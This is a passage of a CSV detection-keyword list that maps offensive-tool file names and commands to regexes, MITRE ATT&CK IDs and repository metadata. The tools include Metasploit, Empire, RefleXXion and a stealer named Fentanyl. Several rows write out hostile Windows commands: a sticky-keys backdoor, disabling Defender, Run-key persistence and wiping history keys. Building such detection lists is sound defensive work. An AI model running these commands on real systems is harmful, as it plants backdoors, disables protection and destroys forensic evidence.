"*ReflectiveLoader.cpp*",".{0,1000}ReflectiveLoader\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" 
"*ReflectiveLoader.cpp*",".{0,1000}ReflectiveLoader\.cpp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ReflectiveLoader.h*",".{0,1000}ReflectiveLoader\.h.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*ReflectiveNTDLL.cpp*",".{0,1000}ReflectiveNTDLL\.cpp.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNTDLL.exe*",".{0,1000}ReflectiveNTDLL\.exe.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNTDLL.sln*",".{0,1000}ReflectiveNTDLL\.sln.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - 
T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNTDLL.vcxproj*",".{0,1000}ReflectiveNTDLL\.vcxproj.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNtdll-main*",".{0,1000}ReflectiveNtdll\-main.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*ReflectivePick_x64_orig.dll*",".{0,1000}ReflectivePick_x64_orig\.dll.{0,1000}","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1112","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ReflectivePick_x86_orig.dll*",".{0,1000}ReflectivePick_x86_orig\.dll.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1113","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*RefleXXion*ntdll.dll*",".{0,1000}RefleXXion.{0,1000}ntdll\.dll.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. 
NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","478","103","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion.sln*",".{0,1000}RefleXXion\.sln.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","478","103","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion-DLL*",".{0,1000}RefleXXion\-DLL.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","478","103","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion-EXE*",".{0,1000}RefleXXion\-EXE.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. 
NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","478","103","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion-main*",".{0,1000}RefleXXion\-main.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","478","103","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /v Debugger /t REG_SZ /d ""C:\windows\system32\cmd.exe""*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe\""\s\/v\sDebugger\s\/t\sREG_SZ\s\/d\s\""C\:\\windows\\system32\\cmd\.exe\"".{0,1000}","offensive_tool_keyword","Windows-Crack","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/japd06/Windows-Crack/","1","0","N/A","9","1","15","9","2019-04-17T21:54:13Z","2019-06-19T04:00:51Z" "*reg add ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"" /v ""SettingsPageVisibility"" /t REG_SZ /d ""hide:recovery;windowsdefender"" /f >nul*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\""\s\/v\s\""SettingsPageVisibility\""\s\/t\sREG_SZ\s\/d\s\""hide\:recovery\;windowsdefender\""\s\/f\s\>nul.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal 
Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*REG ADD *igfxCUIService*",".{0,1000}REG\sADD\s.{0,1000}igfxCUIService.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v ""CursorInit"" /t REG_SZ /d *",".{0,1000}REG\sADD\sHKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\s\/v\s\""CursorInit\""\s\/t\sREG_SZ\s\/d\s.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*REG ADD 
HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ""CursorInit"" /t REG_SZ /d *",".{0,1000}REG\sADD\sHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\s\/v\s\""CursorInit\""\s\/t\sREG_SZ\s\/d\s.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V*saint.jar*",".{0,1000}REG\sADD\sHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\s\/V.{0,1000}saint\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*Reg Add 'HKLM\Software\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f*",".{0,1000}Reg\sAdd\s\'HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender\'\s\/v\sDisableAntiSpyware\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - 
T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Classes\\Local\sSettings\\Software\\Microsoft\\Windows\\Shell\\MuiCache\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Internet Explorer\TypedPaths"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Internet\sExplorer\\TypedPaths\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Internet Explorer\TypedURLs"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Internet\sExplorer\\TypedURLs\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppBadgeUpdated"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FeatureUsage\\AppBadgeUpdated\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppLaunch"" 
/f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FeatureUsage\\AppLaunch\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\ShowJumpView"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FeatureUsage\\ShowJumpView\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - 
T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - 
T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Search\\RecentApps\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe""*",".{0,1000}REG\sDELETE\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe\"".{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*reg delete *HKEY_LOCAL_MACHINE\SOFTWARE\YourSoftware\Schedule\TaskCache\Tree\* SD *",".{0,1000}reg\sdelete\s.{0,1000}HKEY_LOCAL_MACHINE\\SOFTWARE\\YourSoftware\\Schedule\\TaskCache\\Tree\\.{0,1000}\sSD\s.{0,1000}","offensive_tool_keyword","reg","the threat actor deleted the SD value within the Tree registry path (hide scheduled task creation)","T1562","TA0005","Tarrask 
Malware","HAFNIUM","Defense Evasion","https://www.microsoft.com/en-us/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/","1","0","risk of False positive","9","10","N/A","N/A","N/A","N/A" "*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f*",".{0,1000}reg\sdelete\sHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\s\/va\s\/f.{0,1000}","offensive_tool_keyword","reg","Delete run box history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Security /f*",".{0,1000}reg\sdelete\sHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\s\/v\sSecurity\s\/f.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - 